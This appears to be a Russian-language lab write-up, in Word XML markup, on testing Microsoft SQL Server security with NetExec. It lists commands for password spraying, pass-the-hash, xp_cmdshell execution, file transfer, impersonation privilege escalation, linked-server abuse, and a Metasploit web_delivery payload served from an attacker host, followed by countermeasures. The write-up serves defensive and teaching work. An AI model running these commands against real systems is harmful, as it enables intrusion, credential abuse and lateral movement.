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Тестирование защищённости Microsoft SQL Server с помощью NetExec:</w:t>
        <w:br/>
        <w:t>техники атаки и меры противодействия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эксплуатации типовых ошибок конфигурации СУБД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тестирование защищённости Microsoft SQL Server с применением инструмента NetExec (nxc) — преемника CrackMapExec. Систематизированы техники модуля mssql: аутентификация (пароль, передача хеша, доменный и локальный вход), перечисление, выполнение запросов и команд ОС через xp_cmdshell, передача файлов, повышение привилегий через олицетворение, эксплуатация связанных серверов и перемещение по сети. Подчёркивается, что рассмотренные приёмы используют не уязвимости, а типовые ошибки конфигурации; предложены меры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Microsoft SQL Server; NetExec; xp_cmdshell; олицетворение; связанные серверы; передача хеша; перемещение по сети.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NetExec (nxc) — активно поддерживаемый преемник CrackMapExec, предоставляющий единый быстрый интерфейс для атак на сетевые службы в масштабе. Модуль MSSQL позволяет распылять учётные данные, воспроизводить NTLM-хеши, выполнять команды ОС, двунаправленно передавать файлы, использовать права олицетворения и перемещаться через связанные серверы. Microsoft SQL Server — ценная цель, поскольку хранит чувствительные данные, работает под привилегированными служебными учётными записями и нередко доверяет другим серверам БД. Цель работы — систематизировать техники и меры противодействия с позиции защитника. В командах конкретные пароли и хеши заменены плейсхолдерами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Испытательный стенд</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Атакующий узел — Kali Linux (192.168.1.17) с NetExec и Metasploit. Цель — Windows Server 2019 (192.168.1.13), экземпляр SQL Express, порт 1433 (а также 9070), домен ignite.local, связанный сервер WIN-SQL. В приводимых командах используются плейсхолдеры &lt;password&gt; и &lt;ntlm-hash&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Аутентификация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Распыление учётных данных (доменная и локальная аутентификация), передача хеша, подтверждение одной пары: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users.txt -p pass.txt --continue-on-success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users.txt -p pass.txt --continue-on-success --local-auth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users.txt -H &lt;ntlm-hash&gt; --continue-on-success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sa -p '&lt;password&gt;' --local-auth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administrator -p '&lt;password&gt;' -d ignite.local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Выполнение запросов и команд ОС</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Произвольный T-SQL-запрос (-q) и выполнение команд ОС через xp_cmdshell (-x), в том числе по хешу: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sa -p '&lt;password&gt;' --local-auth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-q 'SELECT name FROM master.dbo.sysdatabases;'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administrator -p '&lt;password&gt;' -d ignite.local -x ipconfig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administrator -H &lt;ntlm-hash&gt; -x ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Передача файлов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Загрузка на цель (--put-file) и выгрузка с цели (--get-file):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administrator -p '&lt;password&gt;' -d ignite.local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--put-file file.txt 'C:\Windows\Temp\file.txt'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administrator -p '&lt;password&gt;' -d ignite.local \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--get-file 'C:\Windows\Temp\file.txt' /tmp/file.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Повышение привилегий через олицетворение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Модуль mssql_priv: перечисление, повышение до sysadmin и откат изменений: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ignite -p '&lt;password&gt;' -M mssql_priv --local-auth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... -M mssql_priv --local-auth -o ACTION=privesc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nxc mssql ... -M mssql_priv --local-auth -o ACTION=rollback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7. Управление xp_cmdshell и перечисление</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Включение xp_cmdshell, проверка контекста службы и модули перечисления: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... -M enable_cmdshell -o ACTION=enable --local-auth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... --local-auth -x whoami   # nt service\mssql$sqlexpress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... --local-auth -M enum_impersonate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... --local-auth -M enum_logins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nxc mssql ... --local-auth -M enum_links</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>8. Эксплуатация связанных серверов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнение запроса и команд ОС на связанном сервере, управление xp_cmdshell на нём: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... -M exec_on_link -o LINKED_SERVER=WIN-SQL COMMAND='select @@servername'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... -M link_enable_cmdshell -o LINKED_SERVER=WIN-SQL ACTION=enable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... -M link_xpcmd -o LINKED_SERVER=WIN-SQL CMD='whoami'  # win-sql\administrator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nxc mssql ... -M link_enable_cmdshell -o LINKED_SERVER=WIN-SQL ACTION=disable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>9. Интеграция с Metasploit и перемещение по сети</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Доставка нагрузки web_delivery, работа с нестандартным портом и проверка связности через СУБД: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administrator -p '&lt;password&gt;' -d ignite.local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-M web_delivery -o URL=http://192.168.1.17:8080/&lt;path&gt;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mssql 192.168.1.13 -u administrator -p '&lt;password&gt;' --port 9070 -d ignite.local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nxc mssql ... -d ignite.local -M test_connection -o HOST=192.168.1.11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>10. Меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Поскольку рассмотренные приёмы используют ошибки конфигурации, защита строится комплексно: надёжная аутентификация (длинные уникальные пароли, удаление или ограничение учётной записи sa); защита учётных данных (ограничение NTLM, ротация секретов служебных учётных записей, LAPS); поддержание xp_cmdshell отключённым и оповещение при его включении; аудит и минимизация прав IMPERSONATE и EXECUTE AS; инвентаризация и ограничение доверия связанных серверов с применением минимальных привилегий; запуск SQL Server под низкопривилегированным контекстом; одинаковое усиление независимо от номера порта; сегментация сети для изоляции серверов БД; мониторинг отказов аутентификации, изменений конфигурации, PowerShell-стейджеров и аномального исходящего трафика.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>11. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В работе систематизированы техники тестирования защищённости Microsoft SQL Server с помощью NetExec — от обнаружения учётных данных через повышение привилегий и перемещение по связанным серверам до полной компрометации через Metasploit. Ни один из приёмов не опирается на новую уязвимость: каждый эксплуатирует знакомую ошибку конфигурации. Следовательно, цепочку атаки следует разрывать задолго до достижения данных — за счёт строгой аутентификации, минимальных привилегий, усиления связанных серверов и всестороннего мониторинга активности СУБД.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Pennington M. et al. NetExec (nxc): the network execution tool. Project documentation and GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Microsoft. xp_cmdshell Server Configuration Option. SQL Server documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Microsoft. EXECUTE AS and impersonation in SQL Server. SQL Server documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Microsoft. Linked Servers (Database Engine). SQL Server documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. MITRE ATT&amp;CK. Command and Scripting Interpreter; Valid Accounts; Lateral Movement techniques.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